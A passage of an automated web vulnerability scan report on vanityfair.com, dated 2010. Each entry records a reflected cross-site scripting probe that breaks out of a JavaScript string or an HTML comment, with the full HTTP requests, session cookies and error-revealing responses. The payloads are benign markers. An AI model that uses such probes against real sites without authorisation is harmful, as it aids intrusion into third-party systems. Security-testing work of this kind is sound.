Host:   http://www.vanityfair.com
Path:   /online/oscars/boardwalk-empire/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eab64'%3b1aceb5a8b7a was submitted in the REST URL parameter 3. This input was echoed as eab64';1aceb5a8b7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/boardwalk-empireeab64'%3b1aceb5a8b7a/ HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:32 GMT
Date: Mon, 29 Nov 2010 16:49:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/boardwalk-empireeab64';1aceb5a8b7a',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.230. http://www.vanityfair.com/online/oscars/glee-cap/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/glee-cap/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803c8'%3be4ad757f0b was submitted in the REST URL parameter 3. This input was echoed as 803c8';e4ad757f0b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/glee-cap803c8'%3be4ad757f0b/ HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:33 GMT
Date: Mon, 29 Nov 2010 16:49:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/glee-cap803c8';e4ad757f0b',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.231. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/as-im-sure-some-of.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 16bdf-->0c6977c81a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/201016bdf-->0c6977c81a9/11/as-im-sure-some-of.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:12 GMT
Date: Mon, 29 Nov 2010 16:50:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[964223740]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/201016bdf-->0c6977c81a9/11/as-im-sure-some-of.html?proxyuri=online%2Fwolcott%2F201016bdf--%3E0c6977c81a9%2F11%2Fas-im-sure-some-of.html':
escaped absolute path not valid.
->
...[SNIP]...

1.232. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/as-im-sure-some-of.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f18f7'%3b5fc559ddf94 was submitted in the REST URL parameter 3. This input was echoed as f18f7';5fc559ddf94 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010f18f7'%3b5fc559ddf94/11/as-im-sure-some-of.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:10 GMT
Date: Mon, 29 Nov 2010 16:50:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77401


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010f18f7';5fc559ddf94/11/as-im-sure-some-of.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.
...[SNIP]...

1.233. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/as-im-sure-some-of.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b3a6'%3b4834cb91509 was submitted in the REST URL parameter 4. This input was echoed as 9b3a6';4834cb91509 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/119b3a6'%3b4834cb91509/as-im-sure-some-of.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:23 GMT
Date: Mon, 29 Nov 2010 16:50:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/119b3a6';4834cb91509/as-im-sure-some-of.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",

...[SNIP]...

1.234. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/as-im-sure-some-of.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload c084b-->7681ea82b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/11c084b-->7681ea82b5/as-im-sure-some-of.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:24 GMT
Date: Mon, 29 Nov 2010 16:50:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
se bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[743244606]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11c084b-->7681ea82b5/as-im-sure-some-of.html?proxyuri=online%2Fwolcott%2F2010%2F11c084b--%3E7681ea82b5%2Fas-im-sure-some-of.html':
escaped absolute path not valid.
->
...[SNIP]...

1.235. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/as-im-sure-some-of.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 8b28f-->25d5bfdd754 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/11/as-im-sure-some-of.html8b28f-->25d5bfdd754 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:35 GMT
Date: Mon, 29 Nov 2010 16:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80279


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
commons.exceptions.ApplicationBug:
-:[1021916641]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html8b28f-->25d5bfdd754?proxyuri=online%2Fwolcott%2F2010%2F11%2Fas-im-sure-some-of.html8b28f--%3E25d5bfdd754':
escaped absolute path not valid.
->
...[SNIP]...

1.236. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/as-im-sure-some-of.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa66'%3b258d3baed92 was submitted in the REST URL parameter 5. This input was echoed as faa66';258d3baed92 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/11/as-im-sure-some-of.htmlfaa66'%3b258d3baed92 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:33 GMT
Date: Mon, 29 Nov 2010 16:50:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77401


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.htmlfaa66';258d3baed92',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.237. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/it-saddens-me-to-think.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e16f'%3bb4cab99c097 was submitted in the REST URL parameter 3. This input was echoed as 7e16f';b4cab99c097 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/20107e16f'%3bb4cab99c097/11/it-saddens-me-to-think.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:29 GMT
Date: Mon, 29 Nov 2010 16:49:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/20107e16f';b4cab99c097/11/it-saddens-me-to-think.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globa
...[SNIP]...

1.238. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/it-saddens-me-to-think.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b91e8-->d5a43465373 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010b91e8-->d5a43465373/11/it-saddens-me-to-think.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:31 GMT
Date: Mon, 29 Nov 2010 16:49:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1789560337]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010b91e8-->d5a43465373/11/it-saddens-me-to-think.html?proxyuri=online%2Fwolcott%2F2010b91e8--%3Ed5a43465373%2F11%2Fit-saddens-me-to-think.html':
escaped absolute path not valid.
->
...[SNIP]...

1.239. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/it-saddens-me-to-think.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload b7360-->c91f9ff0b94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/11b7360-->c91f9ff0b94/it-saddens-me-to-think.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
